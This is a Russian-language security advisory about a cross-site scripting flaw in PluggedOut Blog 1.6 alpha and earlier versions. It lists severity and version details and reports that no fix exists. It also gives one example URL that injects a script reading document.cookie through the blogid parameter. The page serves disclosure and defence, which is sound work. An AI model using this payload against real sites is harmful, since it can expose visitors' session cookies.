Межсайтовый скриптинг в PluggedOut Blog

Дата публикации:
08.08.2004
Дата изменения:
17.10.2006
Всего просмотров:
1538
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PluggedOut Blog 1.6 alpha и более ранние версии

Описание: Уязвимость в PluggedOut Blog позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/blog/blog_exec.php?action=remove_blog&blogid=<script>alert(document.cookie);</script>

URL производителя: http://www.pluggedout.com/index.php?pageid=3

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: xss in blog system

или введите имя

CAPTCHA